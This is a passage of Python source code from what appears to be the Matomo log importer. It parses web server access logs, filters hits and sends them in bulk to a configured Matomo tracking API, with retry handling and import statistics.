%(count_lines_recorded)d requests imported to %(total_sites)d sites
%(total_sites_existing)d sites already existed
%(total_sites_created)d sites were created:
%(sites_created)s
%(total_sites_ignored)d distinct hostnames did not match any existing site:
%(sites_ignored)s
%(sites_ignored_tips)s
Performance summary
-------------------
Total time: %(total_time)d seconds
Requests imported per second: %(speed_recording)s requests per second
Processing your log data
------------------------
In order for your logs to be processed by Matomo, you may need to run the following command:
./console core:archive --force-all-websites --force-all-periods=315576000 --force-date-last-n=1000 --url='%(url)s'
''' % {
'count_lines_recorded': self.count_lines_recorded.value,
'count_lines_downloads': self.count_lines_downloads.value,
'total_lines_ignored': sum([
self.count_lines_invalid.value,
self.count_lines_filtered.value,
self.count_lines_skipped_user_agent.value,
self.count_lines_skipped_http_errors.value,
self.count_lines_skipped_http_redirects.value,
self.count_lines_static.value,
self.count_lines_skipped_downloads.value,
self.count_lines_no_site.value,
self.count_lines_hostname_skipped.value,
]),
'count_lines_invalid': self.count_lines_invalid.value,
'count_lines_filtered': self.count_lines_filtered.value,
'count_lines_skipped_user_agent': self.count_lines_skipped_user_agent.value,
'count_lines_skipped_http_errors': self.count_lines_skipped_http_errors.value,
'count_lines_skipped_http_redirects': self.count_lines_skipped_http_redirects.value,
'count_lines_static': self.count_lines_static.value,
'count_lines_skipped_downloads': self.count_lines_skipped_downloads.value,
'count_lines_no_site': self.count_lines_no_site.value,
'count_lines_hostname_skipped': self.count_lines_hostname_skipped.value,
'total_sites': len(self.matomo_sites),
'total_sites_existing': len(self.matomo_sites - set(site_id for hostname, site_id in self.matomo_sites_created)),
'total_sites_created': len(self.matomo_sites_created),
'sites_created': self._indent_text(
['%s (ID: %d)' % (hostname, site_id) for hostname, site_id in self.matomo_sites_created],
level=3,
),
'total_sites_ignored': len(self.matomo_sites_ignored),
'sites_ignored': self._indent_text(
self.matomo_sites_ignored, level=3,
),
'sites_ignored_tips': '''
TIPs:
- if one of these hosts is an alias host for one of the websites
in Matomo, you can add this host as an "Alias URL" in Settings > Websites.
- use --add-sites-new-hosts if you wish to automatically create
one website for each of these hosts in Matomo rather than discarding
these requests.
- use --idsite-fallback to force all these log lines with a new hostname
to be recorded in a specific idsite (for example for troubleshooting/visualizing the data)
- use --idsite to force all lines in the specified log files
to be all recorded in the specified idsite
- or you can also manually create a new Website in Matomo with the URL set to this hostname
''' if self.matomo_sites_ignored else '',
'total_time': self.time_stop - self.time_start,
'speed_recording': self._round_value(self._compute_speed(
self.count_lines_recorded.value,
self.time_start, self.time_stop,
)),
'url': config.options.matomo_api_url,
'invalid_lines': invalid_lines_summary
})
##
## The monitor is a thread that prints a short summary each second.
##
def _monitor(self):
latest_total_recorded = 0
while not self.monitor_stop:
current_total = stats.count_lines_recorded.value
time_elapsed = time.time() - self.time_start
print('%d lines parsed, %d lines recorded, %d records/sec (avg), %d records/sec (current)' % (
stats.count_lines_parsed.value,
current_total,
current_total / time_elapsed if time_elapsed != 0 else 0,
(current_total - latest_total_recorded) / config.options.show_progress_delay,
))
latest_total_recorded = current_total
time.sleep(config.options.show_progress_delay)
def start_monitor(self):
t = threading.Thread(target=self._monitor)
t.daemon = True
t.start()
def stop_monitor(self):
self.monitor_stop = True
class UrlHelper(object):
@staticmethod
def convert_array_args(args):
"""
Converts PHP deep query param arrays (eg, w/ names like hsr_ev[abc][0][]=value) into a nested list/dict
structure that will convert correctly to JSON.
"""
final_args = {}
for key, value in args.iteritems():
indices = key.split('[')
if '[' in key:
# contains list of all indices, eg for abc[def][ghi][] = 123, indices would be ['abc', 'def', 'ghi', '']
indices = [i.rstrip(']') for i in indices]
# navigate the multidimensional array final_args, creating lists/dicts when needed, using indices
element = final_args
for i in range(0, len(indices) - 1):
idx = indices[i]
# if there's no next key, then this element is a list, otherwise a dict
element_type = list if not indices[i + 1] else dict
if idx not in element or not isinstance(element[idx], element_type):
element[idx] = element_type()
element = element[idx]
# set the value in the final container we navigated to
if not indices[-1]: # last index is '[]'
element.append(value)
else: # last index has a key, eg, '[abc]'
element[indices[-1]] = value
else:
final_args[key] = value
return UrlHelper._convert_dicts_to_arrays(final_args)
@staticmethod
def _convert_dicts_to_arrays(d):
# convert dicts that have contiguous integer keys to arrays
for key, value in d.iteritems():
if not isinstance(value, dict):
continue
if UrlHelper._has_contiguous_int_keys(value):
d[key] = UrlHelper._convert_dict_to_array(value)
else:
d[key] = UrlHelper._convert_dicts_to_arrays(value)
return d
@staticmethod
def _has_contiguous_int_keys(d):
for i in range(0, len(d)):
if str(i) not in d:
return False
return True
@staticmethod
def _convert_dict_to_array(d):
result = []
for i in range(0, len(d)):
result.append(d[str(i)])
return result
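# A minimal sketch of what convert_array_args produces (illustrative, not part of
# the importer): the PHP-style key 'hsr_ev[abc][0][]' is unpacked into nested
# containers, and dicts whose keys are contiguous integers become lists.
#   UrlHelper.convert_array_args({'hsr_ev[abc][0][]': 'value', 'idsite': '1'})
#   # -> {'hsr_ev': {'abc': [['value']]}, 'idsite': '1'}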
class Matomo(object):
"""
Make requests to Matomo.
"""
class Error(Exception):
def __init__(self, message, code = None):
super(Exception, self).__init__(message)
self.code = code
class RedirectHandlerWithLogging(urllib2.HTTPRedirectHandler):
"""
Special implementation of HTTPRedirectHandler that logs redirects in debug mode
to help users debug system issues.
"""
def redirect_request(self, req, fp, code, msg, hdrs, newurl):
logging.debug("Request redirected (code: %s) to '%s'" % (code, newurl))
return urllib2.HTTPRedirectHandler.redirect_request(self, req, fp, code, msg, hdrs, newurl)
@staticmethod
def _call(path, args, headers=None, url=None, data=None):
"""
Make a request to the Matomo site. It is up to the caller to format
arguments, to embed authentication, etc.
"""
if url is None:
url = config.options.matomo_url
headers = headers or {}
if data is None:
# If Content-Type isn't defined, PHP does not parse the request's body.
headers['Content-type'] = 'application/x-www-form-urlencoded'
data = urllib.urlencode(args)
elif not isinstance(data, basestring) and headers['Content-type'] == 'application/json':
data = json.dumps(data)
if args:
path = path + '?' + urllib.urlencode(args)
if config.options.request_suffix:
path = path + ('&' if '?' in path else '?') + config.options.request_suffix
headers['User-Agent'] = 'Matomo/LogImport'
try:
timeout = config.options.request_timeout
except:
timeout = None # the config global object may not be created at this point
request = urllib2.Request(url + path, data, headers)
# Handle basic auth if auth_user set
try:
auth_user = config.options.auth_user
auth_password = config.options.auth_password
except:
auth_user = None
auth_password = None
if auth_user is not None:
base64string = base64.encodestring('%s:%s' % (auth_user, auth_password)).replace('\n', '')
request.add_header("Authorization", "Basic %s" % base64string)
# Use non-default SSL context if invalid certificates shall be
# accepted.
if config.options.accept_invalid_ssl_certificate and \
sys.version_info >= (2, 7, 9):
ssl_context = ssl.create_default_context()
ssl_context.check_hostname = False
ssl_context.verify_mode = ssl.CERT_NONE
https_handler_args = {'context': ssl_context}
else:
https_handler_args = {}
opener = urllib2.build_opener(
Matomo.RedirectHandlerWithLogging(),
urllib2.HTTPSHandler(**https_handler_args))
response = opener.open(request, timeout = timeout)
result = response.read()
response.close()
return result
@staticmethod
def _call_api(method, **kwargs):
"""
Make a request to the Matomo API taking care of authentication, body
formatting, etc.
"""
args = {
'module' : 'API',
'format' : 'json2',
'method' : method,
'filter_limit' : '-1',
}
# token_auth, by default, is taken from config.
token_auth = kwargs.pop('_token_auth', None)
if token_auth is None:
token_auth = config.options.matomo_token_auth
if token_auth:
args['token_auth'] = token_auth
url = kwargs.pop('_url', None)
if url is None:
url = config.options.matomo_api_url
if kwargs:
args.update(kwargs)
# Convert lists into appropriate format.
# See: http://developer.matomo.org/api-reference/reporting-api#passing-an-array-of-data-as-a-parameter
# Warning: we have to pass the parameters in order: foo[0], foo[1], foo[2]
# and not foo[1], foo[0], foo[2] (it will break Matomo otherwise.)
final_args = []
for key, value in args.iteritems():
if isinstance(value, (list, tuple)):
for index, obj in enumerate(value):
final_args.append(('%s[%d]' % (key, index), obj))
else:
final_args.append((key, value))
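# For example (a sketch, not part of the importer): the 'urls' list passed to
# SitesManager.addSite, {'urls': ['http://a', 'http://b']}, is expanded to
# ('urls[0]', 'http://a'), ('urls[1]', 'http://b'), preserving index order.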
# logging.debug('%s' % final_args)
# logging.debug('%s' % url)
res = Matomo._call('/', final_args, url=url)
try:
return json.loads(res)
except ValueError:
raise urllib2.URLError('Matomo returned an invalid response: ' + res)
@staticmethod
def _call_wrapper(func, expected_response, on_failure, *args, **kwargs):
"""
Retry requests to Matomo up to the configured maximum number of attempts (MATOMO_DEFAULT_MAX_ATTEMPTS by default).
"""
errors = 0
while True:
try:
response = func(*args, **kwargs)
if expected_response is not None and response != expected_response:
if on_failure is not None:
error_message = on_failure(response, kwargs.get('data'))
else:
error_message = "didn't receive the expected response. Response was %s " % response
raise urllib2.URLError(error_message)
return response
except (urllib2.URLError, httplib.HTTPException, ValueError, socket.timeout) as e:
logging.info('Error when connecting to Matomo: %s', e)
code = None
if isinstance(e, urllib2.HTTPError):
# See Python issue 13211.
message = 'HTTP Error %s %s' % (e.code, e.msg)
code = e.code
elif isinstance(e, urllib2.URLError):
message = e.reason
else:
message = str(e)
# decorate message w/ HTTP response, if it can be retrieved
if hasattr(e, 'read'):
message = message + ", response: " + e.read()
try:
delay_after_failure = config.options.delay_after_failure
max_attempts = config.options.max_attempts
except NameError:
delay_after_failure = MATOMO_DEFAULT_DELAY_AFTER_FAILURE
max_attempts = MATOMO_DEFAULT_MAX_ATTEMPTS
errors += 1
if errors == max_attempts:
logging.info("Max number of attempts reached, server is unreachable!")
raise Matomo.Error(message, code)
else:
logging.info("Retrying request, attempt number %d" % (errors + 1))
time.sleep(delay_after_failure)
@classmethod
def call(cls, path, args, expected_content=None, headers=None, data=None, on_failure=None):
return cls._call_wrapper(cls._call, expected_content, on_failure, path, args, headers,
data=data)
@classmethod
def call_api(cls, method, **kwargs):
return cls._call_wrapper(cls._call_api, None, None, method, **kwargs)
##
## Resolvers.
##
## A resolver is a class that turns a hostname into a Matomo site ID.
##
class StaticResolver(object):
"""
Always return the same site ID, specified in the configuration.
"""
def __init__(self, site_id):
self.site_id = site_id
# Go get the main URL
site = matomo.call_api(
'SitesManager.getSiteFromId', idSite=self.site_id
)
if site.get('result') == 'error':
fatal_error(
"cannot get the main URL of this site: %s" % site.get('message')
)
self._main_url = site['main_url']
stats.matomo_sites.add(self.site_id)
def resolve(self, hit):
return (self.site_id, self._main_url)
def check_format(self, format):
pass
class DynamicResolver(object):
"""
Use Matomo API to determine the site ID.
"""
_add_site_lock = threading.Lock()
def __init__(self):
self._cache = {}
if config.options.replay_tracking:
# get existing sites
self._cache['sites'] = matomo.call_api('SitesManager.getAllSites')
def _get_site_id_from_hit_host(self, hit):
return matomo.call_api(
'SitesManager.getSitesIdFromSiteUrl',
url=hit.host,
)
def _add_site(self, hit):
main_url = 'http://' + hit.host
DynamicResolver._add_site_lock.acquire()
try:
# After we obtain the lock, make sure the site hasn't already been created.
res = self._get_site_id_from_hit_host(hit)
if res:
return res[0]['idsite']
# The site doesn't exist.
logging.debug('No Matomo site found for the hostname: %s', hit.host)
if config.options.site_id_fallback is not None:
logging.debug('Using default site for hostname: %s', hit.host)
return config.options.site_id_fallback
elif config.options.add_sites_new_hosts:
if config.options.dry_run:
# Let's just return a fake ID.
return 0
logging.debug('Creating a Matomo site for hostname %s', hit.host)
result = matomo.call_api(
'SitesManager.addSite',
siteName=hit.host,
urls=[main_url],
)
if result.get('result') == 'error':
logging.error("Couldn't create a Matomo site for host %s: %s",
hit.host, result.get('message'),
)
return None
else:
site_id = result['value']
stats.matomo_sites_created.append((hit.host, site_id))
return site_id
else:
# The site doesn't exist, we don't want to create new sites and
# there's no default site ID. We thus have to ignore this hit.
return None
finally:
DynamicResolver._add_site_lock.release()
def _resolve(self, hit):
res = self._get_site_id_from_hit_host(hit)
if res:
# The site already exists.
site_id = res[0]['idsite']
else:
site_id = self._add_site(hit)
if site_id is not None:
stats.matomo_sites.add(site_id)
return site_id
def _resolve_when_replay_tracking(self, hit):
"""
If the parsed site ID is found in _cache['sites'], return (site ID, main_url);
otherwise return the (None, None) tuple.
"""
site_id = hit.args['idsite']
if site_id in self._cache['sites']:
stats.matomo_sites.add(site_id)
return (site_id, self._cache['sites'][site_id]['main_url'])
else:
return (None, None)
def _resolve_by_host(self, hit):
"""
Returns the site ID and site URL for a hit based on the hostname.
"""
try:
site_id = self._cache[hit.host]
except KeyError:
logging.debug(
'Site ID for hostname %s not in cache', hit.host
)
site_id = self._resolve(hit)
logging.debug('Site ID for hostname %s: %s', hit.host, site_id)
self._cache[hit.host] = site_id
return (site_id, 'http://' + hit.host)
def resolve(self, hit):
"""
Return the site ID from the cache if found, otherwise call _resolve.
If replay_tracking option is enabled, call _resolve_when_replay_tracking.
"""
if config.options.replay_tracking:
# Replay tracking only considers piwik.php requests, which don't need the host to be resolved.
return self._resolve_when_replay_tracking(hit)
else:
# Workaround for empty Host bug issue #126
if hit.host.strip() == '':
hit.host = 'no-hostname-found-in-log'
return self._resolve_by_host(hit)
def check_format(self, format):
if config.options.replay_tracking:
pass
elif format.regex is not None and 'host' not in format.regex.groupindex and not config.options.log_hostname:
fatal_error(
"the selected log format doesn't include the hostname: you must "
"specify the Matomo site ID with the --idsite argument"
)
class Recorder(object):
"""
A Recorder fetches hits from the Queue and inserts them into Matomo using
the API.
"""
recorders = []
def __init__(self):
self.queue = Queue.Queue(maxsize=2)
# if bulk tracking disabled, make sure we can store hits outside of the Queue
if not config.options.use_bulk_tracking:
self.unrecorded_hits = []
@classmethod
def launch(cls, recorder_count):
"""
Launch a bunch of Recorder objects in a separate thread.
"""
for i in xrange(recorder_count):
recorder = Recorder()
cls.recorders.append(recorder)
run = recorder._run_bulk if config.options.use_bulk_tracking else recorder._run_single
t = threading.Thread(target=run)
t.daemon = True
t.start()
logging.debug('Launched recorder')
@classmethod
def add_hits(cls, all_hits):
"""
Add a set of hits to the recorders queue.
"""
# Organize hits so that one client IP will always use the same queue.
# We have to do this so visits from the same IP will be added in the right order.
hits_by_client = [[] for r in cls.recorders]
for hit in all_hits:
hits_by_client[hit.get_visitor_id_hash() % len(cls.recorders)].append(hit)
for i, recorder in enumerate(cls.recorders):
recorder.queue.put(hits_by_client[i])
@classmethod
def wait_empty(cls):
"""
Wait until all recorders have an empty queue.
"""
for recorder in cls.recorders:
recorder._wait_empty()
def _run_bulk(self):
while True:
try:
hits = self.queue.get()
except:
# TODO: we should log something here; however, when this happens, logging calls themselves throw
return
if len(hits) > 0:
try:
self._record_hits(hits)
except Matomo.Error as e:
fatal_error(e, hits[0].filename, hits[0].lineno) # approximate location of error
self.queue.task_done()
def _run_single(self):
while True:
if config.options.force_one_action_interval != False:
time.sleep(config.options.force_one_action_interval)
if len(self.unrecorded_hits) > 0:
hit = self.unrecorded_hits.pop(0)
try:
self._record_hits([hit])
except Matomo.Error as e:
fatal_error(e, hit.filename, hit.lineno)
else:
self.unrecorded_hits = self.queue.get()
self.queue.task_done()
def _wait_empty(self):
"""
Wait until the queue is empty.
"""
while True:
if self.queue.empty():
# We still have to wait for the last queue item being processed
# (queue.empty() returns True before queue.task_done() is
# called).
self.queue.join()
return
time.sleep(1)
def date_to_matomo(self, date):
date, time = date.isoformat(sep=' ').split()
return '%s %s' % (date, time.replace('-', ':'))
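# For example (sketch): date_to_matomo(datetime.datetime(2019, 6, 5, 12, 30, 15))
# returns '2019-06-05 12:30:15', the 'cdt' format expected by the tracker.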
def _get_hit_args(self, hit):
"""
Returns the args used in tracking a hit, without the token_auth.
"""
site_id, main_url = resolver.resolve(hit)
if site_id is None:
# This hit doesn't match any known Matomo site.
if config.options.replay_tracking:
stats.matomo_sites_ignored.add('unrecognized site ID %s' % hit.args.get('idsite'))
else:
stats.matomo_sites_ignored.add(hit.host)
stats.count_lines_no_site.increment()
return
stats.dates_recorded.add(hit.date.date())
path = hit.path
if hit.query_string and not config.options.strip_query_string:
path += config.options.query_string_delimiter + hit.query_string
# only prepend main url / host if it's a path
url_prefix = self._get_host_with_protocol(hit.host, main_url) if hasattr(hit, 'host') else main_url
url = (url_prefix if path.startswith('/') else '') + path[:1024]
# handle custom variables before generating args dict
if config.options.enable_bots:
if hit.is_robot:
hit.add_visit_custom_var("Bot", hit.user_agent)
else:
hit.add_visit_custom_var("Not-Bot", hit.user_agent)
hit.add_page_custom_var("HTTP-code", hit.status)
args = {
'rec': '1',
'apiv': '1',
'url': url.encode('utf8'),
'urlref': hit.referrer[:1024].encode('utf8'),
'cip': hit.ip,
'cdt': self.date_to_matomo(hit.date),
'idsite': site_id,
'dp': '0' if config.options.reverse_dns else '1',
'ua': hit.user_agent.encode('utf8')
}
if config.options.replay_tracking:
# prevent the request from being force-recorded when the replay-tracking option is used
args['rec'] = '0'
# idsite is already determined by resolver
if 'idsite' in hit.args:
del hit.args['idsite']
args.update(hit.args)
if hit.is_download:
args['download'] = args['url']
if config.options.enable_bots:
args['bots'] = '1'
if hit.is_error or hit.is_redirect:
args['action_name'] = '%s%sURL = %s%s' % (
hit.status,
config.options.title_category_delimiter,
urllib.quote(args['url'], ''),
("%sFrom = %s" % (
config.options.title_category_delimiter,
urllib.quote(args['urlref'], '')
) if args['urlref'] != '' else '')
)
if hit.generation_time_milli > 0:
args['gt_ms'] = int(hit.generation_time_milli)
if hit.event_category and hit.event_action:
args['e_c'] = hit.event_category
args['e_a'] = hit.event_action
if hit.event_name:
args['e_n'] = hit.event_name
if hit.length:
args['bw_bytes'] = hit.length
# convert custom variable args to JSON
if 'cvar' in args and not isinstance(args['cvar'], basestring):
args['cvar'] = json.dumps(args['cvar'])
if '_cvar' in args and not isinstance(args['_cvar'], basestring):
args['_cvar'] = json.dumps(args['_cvar'])
return UrlHelper.convert_array_args(args)
def _get_host_with_protocol(self, host, main_url):
if '://' not in host:
parts = urlparse.urlparse(main_url)
host = parts.scheme + '://' + host
return host
def _record_hits(self, hits):
"""
Inserts several hits into Matomo.
"""
if not config.options.dry_run:
data = {
'token_auth': config.options.matomo_token_auth,
'requests': [self._get_hit_args(hit) for hit in hits]
}
try:
args = {}
if config.options.debug_tracker:
args['debug'] = '1'
response = matomo.call(
'/piwik.php', args=args,
expected_content=None,
headers={'Content-type': 'application/json'},
data=data,
on_failure=self._on_tracking_failure
)
if config.options.debug_tracker:
logging.debug('tracker response:\n%s' % response)
# check for invalid requests
try:
response = json.loads(response)
except:
logging.info("bulk tracking returned invalid JSON")
# don't display the tracker response if we're debugging the tracker.
# debug tracker output will always break the normal JSON output.
if not config.options.debug_tracker:
logging.info("tracker response:\n%s" % response)
response = {}
if ('invalid_indices' in response and isinstance(response['invalid_indices'], list) and
response['invalid_indices']):
invalid_count = len(response['invalid_indices'])
invalid_lines = [str(hits[index].lineno) for index in response['invalid_indices']]
invalid_lines_str = ", ".join(invalid_lines)
stats.invalid_lines.extend(invalid_lines)
logging.info("The Matomo tracker identified %s invalid requests on lines: %s" % (invalid_count, invalid_lines_str))
elif 'invalid' in response and response['invalid'] > 0:
logging.info("The Matomo tracker identified %s invalid requests." % response['invalid'])
except Matomo.Error as e:
# if the server returned 400 code, BulkTracking may not be enabled
if e.code == 400:
fatal_error("Server returned status 400 (Bad Request).\nIs the BulkTracking plugin disabled?", hits[0].filename, hits[0].lineno)
raise
stats.count_lines_recorded.advance(len(hits))
def _is_json(self, result):
try:
json.loads(result)
return True
except ValueError as e:
return False
def _on_tracking_failure(self, response, data):
"""
Removes the successfully tracked hits from the request payload so
they are not logged twice.
"""
try:
response = json.loads(response)
except:
# the response should be JSON, but if it can't be parsed, just try another attempt
logging.debug("cannot parse tracker response, should be valid JSON")
return response
# remove the successfully tracked hits from payload
tracked = response['tracked']
data['requests'] = data['requests'][tracked:]
return response['message']
class Hit(object):
"""
A simple container holding the data parsed from a single log line.
"""
def __init__(self, **kwargs):
for key, value in kwargs.iteritems():
setattr(self, key, value)
super(Hit, self).__init__()
if config.options.force_lowercase_path:
self.full_path = self.full_path.lower()
def get_visitor_id_hash(self):
visitor_id = self.ip
if config.options.replay_tracking:
for param_name_to_use in ['uid', 'cid', '_id', 'cip']:
if param_name_to_use in self.args:
visitor_id = self.args[param_name_to_use]
break
return abs(hash(visitor_id))
def add_page_custom_var(self, key, value):
"""
Adds a page custom variable to this Hit.
"""
self._add_custom_var(key, value, 'cvar')
def add_visit_custom_var(self, key, value):
"""
Adds a visit custom variable to this Hit.
"""
self._add_custom_var(key, value, '_cvar')
def _add_custom_var(self, key, value, api_arg_name):
if api_arg_name not in self.args:
self.args[api_arg_name] = {}
if isinstance(self.args[api_arg_name], basestring):
logging.debug("Ignoring custom %s variable addition [ %s = %s ], custom var already set to string." % (api_arg_name, key, value))
return
index = len(self.args[api_arg_name]) + 1
self.args[api_arg_name][index] = [key, value]
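# A small sketch of the resulting structure (not part of the importer):
#   hit.add_page_custom_var('HTTP-code', '404')
# stores hit.args['cvar'] == {1: ['HTTP-code', '404']}; _get_hit_args later
# serializes this dict to JSON before sending it to the tracker.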
class Parser(object):
"""
The Parser parses the lines in a specified file and inserts them into
a Queue.
"""
def __init__(self):
self.check_methods = [method for name, method
in inspect.getmembers(self, predicate=inspect.ismethod)
if name.startswith('check_')]
## All check_* methods are called for each hit and must return True if the
## hit can be imported, False otherwise.
def check_hostname(self, hit):
# Check against config.hostnames.
if not hasattr(hit, 'host') or not config.options.hostnames:
return True
# Accept the hostname only if it matches one pattern in the list.
result = any(
fnmatch.fnmatch(hit.host, pattern)
for pattern in config.options.hostnames
)
if not result:
stats.count_lines_hostname_skipped.increment()
return result
def check_static(self, hit):
if hit.extension in STATIC_EXTENSIONS:
if config.options.enable_static:
hit.is_download = True
return True
else:
stats.count_lines_static.increment()
return False
return True
def check_download(self, hit):
if hit.extension in config.options.download_extensions:
stats.count_lines_downloads.increment()
hit.is_download = True
return True
# the file is not in the whitelisted downloads;
# if it's a known download file, we shall skip it
elif hit.extension in DOWNLOAD_EXTENSIONS:
stats.count_lines_skipped_downloads.increment()
return False
return True
def check_user_agent(self, hit):
user_agent = hit.user_agent.lower()
for s in itertools.chain(EXCLUDED_USER_AGENTS, config.options.excluded_useragents):
if s in user_agent:
if config.options.enable_bots:
hit.is_robot = True
return True
else:
stats.count_lines_skipped_user_agent.increment()
return False
return True
def check_http_error(self, hit):
if hit.status[0] in ('4', '5'):
if config.options.replay_tracking:
# process error logs for replay tracking, since we don't care if Matomo errored the first time
return True
elif config.options.enable_http_errors:
hit.is_error = True
return True
else:
stats.count_lines_skipped_http_errors.increment()
return False
return True
def check_http_redirect(self, hit):
if hit.status[0] == '3' and hit.status != '304':
if config.options.enable_http_redirects:
hit.is_redirect = True
return True
else:
stats.count_lines_skipped_http_redirects.increment()
return False
return True
def check_path(self, hit):
for excluded_path in config.options.excluded_paths:
if fnmatch.fnmatch(hit.path, excluded_path):
return False
# By default, all paths are included.
if config.options.included_paths:
for included_path in config.options.included_paths:
if fnmatch.fnmatch(hit.path, included_path):
return True
return False
return True
@staticmethod
def check_format(lineOrFile):
format = False
format_groups = 0
for name, candidate_format in FORMATS.iteritems():
logging.debug("Check format %s", name)
# skip auto detection for formats that can't be detected automatically
if name == 'ovh':
continue
match = None
try:
if isinstance(lineOrFile, basestring):
match = candidate_format.check_format_line(lineOrFile)
else:
match = candidate_format.check_format(lineOrFile)
except Exception as e:
logging.debug('Error in format checking: %s', traceback.format_exc())
pass
if match:
logging.debug('Format %s matches', name)
# compare format groups if this *BaseFormat has groups() method
try:
# if there's more info in this match, use this format
match_groups = len(match.groups())
logging.debug('Format match contains %d groups' % match_groups)
if format_groups < match_groups:
format = candidate_format
format_groups = match_groups
except AttributeError:
format = candidate_format
else:
logging.debug('Format %s does not match', name)
# if the format is W3cExtendedFormat, check if the logs are from IIS and if so, issue a warning if the
# --w3c-time-taken-milli option isn't set
if isinstance(format, W3cExtendedFormat):
format.check_for_iis_option()
return format
@staticmethod
def detect_format(file):
"""
Return the best matching format for this file, or None if none was found.
"""
logging.debug('Detecting the log format')
format = False
# check the format using the file (for formats like the W3cExtendedFormat one)
format = Parser.check_format(file)
# check the format using the first N lines (to avoid irregular ones)
lineno = 0
limit = 100000
while not format and lineno < limit:
line = file.readline()
if not line: # if at eof, don't keep looping
break
lineno = lineno + 1
logging.debug("Detecting format against line %i" % lineno)
format = Parser.check_format(line)
try:
file.seek(0)
except IOError:
pass
if not format:
fatal_error("cannot automatically determine the log format using the first %d lines of the log file. " % limit +
"\nMaybe try specifying the format with the --log-format-name command line argument." )
return
logging.debug('Format %s is the best match', format.name)
return format
def is_filtered(self, hit):
host = None
if hasattr(hit, 'host'):
host = hit.host
else:
try:
host = urlparse.urlparse(hit.path).hostname
except:
pass
if host:
if config.options.exclude_host and len(config.options.exclude_host) > 0 and host in config.options.exclude_host:
return (True, 'host matched --exclude-host')
if config.options.include_host and len(config.options.include_host) > 0 and host not in config.options.include_host:
return (True, 'host did not match --include-host')
if config.options.exclude_older_than and hit.date < config.options.exclude_older_than:
return (True, 'date is older than --exclude-older-than')
if config.options.exclude_newer_than and hit.date > config.options.exclude_newer_than:
return (True, 'date is newer than --exclude-newer-than')
return (False, None)
def parse(self, filename):
"""
Parse the specified filename and insert hits in the queue.
"""
def invalid_line(line, reason):
stats.count_lines_invalid.increment()
if config.options.debug >= 2:
logging.debug('Invalid line detected (%s): %s' % (reason, line))
def filtered_line(line, reason):
stats.count_lines_filtered.increment()
if config.options.debug >= 2:
logging.debug('Filtered line out (%s): %s' % (reason, line))
if filename == '-':
filename = '(stdin)'
file = sys.stdin
else:
if not os.path.exists(filename):
print >> sys.stderr, "\n=====> Warning: File %s does not exist <=====" % filename
return
else:
if filename.endswith('.bz2'):
open_func = bz2.BZ2File
elif filename.endswith('.gz'):
open_func = gzip.open
else:
open_func = open
file = open_func(filename, 'r')
if config.options.show_progress:
print('Parsing log %s...' % filename)
if config.format:
# The format was explicitly specified.
format = config.format
if isinstance(format, W3cExtendedFormat):
format.create_regex(file)
if format.regex is None:
return fatal_error(
"File is not in the correct format, is there a '#Fields:' line? "
"If not, use the --w3c-fields option."
)
else:
# If the file is empty, don't bother.
data = file.read(100)
if len(data.strip()) == 0:
return
try:
file.seek(0)
except IOError:
pass
format = self.detect_format(file)
if format is None:
return fatal_error(
'Cannot guess the logs format. Please give one using '
'either the --log-format-name or --log-format-regex option'
)
# Make sure the format is compatible with the resolver.
resolver.check_format(format)
if config.options.dump_log_regex:
logging.info("Using format '%s'." % format.name)
if format.regex:
logging.info("Regex being used: %s" % format.regex.pattern)
else:
logging.info("Format %s does not use a regex to parse log lines." % format.name)
logging.info("--dump-log-regex option used, aborting log import.")
os._exit(0)
valid_lines_count = 0
hits = []
lineno = -1
while True:
line = file.readline()
if not line: break
lineno = lineno + 1
try:
line = line.decode(config.options.encoding)
except UnicodeDecodeError:
invalid_line(line, 'invalid encoding')
continue
stats.count_lines_parsed.increment()
if stats.count_lines_parsed.value <= config.options.skip:
continue
match = format.match(line)
if not match:
invalid_line(line, 'line did not match')
continue
valid_lines_count = valid_lines_count + 1
if config.options.debug_request_limit and valid_lines_count >= config.options.debug_request_limit:
if len(hits) > 0:
Recorder.add_hits(hits)
logging.info("Exceeded limit specified in --debug-request-limit, exiting.")
return
hit = Hit(
filename=filename,
lineno=lineno,
status=format.get('status'),
full_path=format.get('path'),
is_download=False,
is_robot=False,
is_error=False,
is_redirect=False,
args={},
)
if config.options.regex_group_to_page_cvars_map:
self._add_custom_vars_from_regex_groups(hit, format, config.options.regex_group_to_page_cvars_map, True)
if config.options.regex_group_to_visit_cvars_map:
self._add_custom_vars_from_regex_groups(hit, format, config.options.regex_group_to_visit_cvars_map, False)
if config.options.regex_groups_to_ignore:
format.remove_ignored_groups(config.options.regex_groups_to_ignore)
# Add http method page cvar
try:
httpmethod = format.get('method')
if config.options.track_http_method and httpmethod != '-':
hit.add_page_custom_var('HTTP-method', httpmethod)
except:
pass
try:
hit.query_string = format.get('query_string')
hit.path = hit.full_path
except BaseFormatException:
hit.path, _, hit.query_string = hit.full_path.partition(config.options.query_string_delimiter)
# W3cExtendedFormat defaults to '-' when there is no query string, but we want an empty string
if hit.query_string == '-':
hit.query_string = ''
hit.extension = hit.path.rsplit('.')[-1].lower()
try:
hit.referrer = format.get('referrer')
if hit.referrer.startswith('"'):
hit.referrer = hit.referrer[1:-1]
except BaseFormatException:
hit.referrer = ''
if hit.referrer == '-':
hit.referrer = ''
try:
hit.user_agent = format.get('user_agent')
# in case a format parser included enclosing quotes, remove them so they are not
# sent to Matomo
if hit.user_agent.startswith('"'):
hit.user_agent = hit.user_agent[1:-1]
except BaseFormatException:
hit.user_agent = ''
hit.ip = format.get('ip')
try:
hit.length = int(format.get('length'))
except (ValueError, BaseFormatException):
# Some lines or formats don't have a length (e.g. 304 redirects, W3C logs)
hit.length = 0
try:
hit.generation_time_milli = float(format.get('generation_time_milli'))
except (ValueError, BaseFormatException):
try:
hit.generation_time_milli = float(format.get('generation_time_micro')) / 1000
except (ValueError, BaseFormatException):
try:
hit.generation_time_milli = float(format.get('generation_time_secs')) * 1000
except (ValueError, BaseFormatException):
hit.generation_time_milli = 0
if config.options.log_hostname:
hit.host = config.options.log_hostname
else:
try:
hit.host = format.get('host').lower().strip('.')
if hit.host.startswith('"'):
hit.host = hit.host[1:-1]
except BaseFormatException:
# Some formats have no host.
pass
# Add userid
try:
hit.userid = None
userid = format.get('userid')
if userid != '-':
hit.args['uid'] = hit.userid = userid
except:
pass
# add event info
try:
hit.event_category = hit.event_action = hit.event_name = None
hit.event_category = format.get('event_category')
hit.event_action = format.get('event_action')
hit.event_name = format.get('event_name')
if hit.event_name == '-':
hit.event_name = None
except:
pass
# Check if the hit must be excluded.
if not all((method(hit) for method in self.check_methods)):
continue
# Parse date.
# We parse it after calling check_methods as it's quite CPU hungry, and
# we want to avoid that cost for excluded hits.
date_string = format.get('date')
try:
